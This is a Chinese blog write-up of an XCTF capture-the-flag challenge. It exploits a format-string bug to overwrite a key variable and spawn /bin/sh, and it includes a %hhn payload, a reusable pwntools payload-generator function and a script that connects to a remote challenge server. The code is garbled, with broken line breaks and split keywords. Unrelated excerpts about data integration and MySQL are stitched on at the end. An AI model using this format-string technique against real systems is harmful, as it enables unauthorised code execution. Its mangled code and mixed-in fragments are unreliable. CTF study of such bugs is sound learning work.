實時資料監測 xctf

2021-10-06 10:51:10 字數 3118 閱讀 9588

保護:

流程:main()

當key=35795746=0x2223322時呼叫system("/bin/sh"),在imagemagic()中又存在格式化字串漏洞。所以只需要更改key的值即可。

先確定偏移量。

偏移量為12。但是我們要向key的位址寫入35795746=0x2223322,如果一次性寫入35795746個字元的話輸入緩衝區可能會溢位導致程式無法執行。所以我們選擇單字元寫入所以payload=p32(0x0804a048)+p32(0x0804a049)+p32(0x0804a04a)+p32(0x0804a04b)+"%18c%12$hhn%17c%13$hhn%239c%14$hhn%224c%15$hhn" (資料在記憶體中是小端序%hhn會寫入單位元組)

\x22=34  		\x33=51  		\x22=34           \x02=2


18+16=34=0x22   34+17=51=0x33   51+239=290=0x122  290+224=514=0x202
也可以使用模板

def


fmt(prev, word, index)


:if prev < word:


result = word - prev


fmtstr =


"%"+


str(result)


+"c"


elif prev == word:


result =


0else


:        result =


256+ word - prev


fmtstr =


"%"+


str(result)


+"c"


fmtstr +=


"%"+


str(index)


+"$hhn"


return fmtstr


# offset 覆蓋的位址最初的偏移 size 機器字長 addr 將要覆蓋的位址 target 要覆蓋為的目的變數值


deffmt_str


(offset, size, addr, target)


:     payload =


""for i in


range(4


):if size ==4:


payload += p32(addr + i)


else


:            payload += p64(addr + i)


prev =


len(payload)


for i in


range(4


):payload += fmt(prev,


(target >> i *8)


&0xff


, offset + i)


prev =


(target >> i *8)


&0xff


return payload


from pwn import


*#sh = process('./a')


sh = remote(


'124.126.19.106'


,'37070'


)def


fmt(prev, word, index)


:if prev < word:


result = word - prev


fmtstr =


"%"+


str(result)


+"c"


elif prev == word:


result =


0else


:        result =


256+ word - prev


fmtstr =


"%"+


str(result)


+"c"


fmtstr +=


"%"+


str(index)


+"$hhn"


return fmtstr


deffmt_str


(offset, size, addr, target)


:    payload =


""for i in


range(4


):if size ==4:


payload += p32(addr + i)


else


:            payload += p64(addr + i)


prev =


len(payload)


for i in


range(4


):payload += fmt(prev,


(target >> i *8)


&0xff


, offset + i)


prev =


(target >> i *8)


&0xff


return payload


# payload=p32(0x0804a048)+p32(0x0804a049)+p32(0x0804a04a)+p32(0x0804a04b)+"%18c%12$hhn%17c%13$hhn%239c%14$hhn%224c%15$hhn"


payload = fmt_str(12,


4,0x0804a048


,0x2223322


)sh.sendline(payload)


sh.interactive(


)

xctf 實時資料監測

這道題很簡單,不過由於數字太大了 所以需要等很久。直接上exp吧 from pwn import p process pwn p remote 220.249.52.134 54140 key value 0x2223322 offset 0xc key 0x804a048payload b 357...

實時資料整合

企業應用整合 面向服務的體系結構 soa 目前應該是乙個很受歡迎的名詞,中介軟體技術人員幾乎到了言必稱soa的程度,資料整合當然也不例外,在oracle openworld2008大會上,就推出了一堆資料整合的專場演講,其中和soa結合最緊密的就是實時資料整合 real time data inte...

實時採集mysql mysql實時資料採集

0 集群環境介紹 10.20.201.51 namenode resourcemanager hmaster spark 10.20.201.52 namenode resourcemanager hmaster spark 10.20.201.53 datanode nodemanager hre...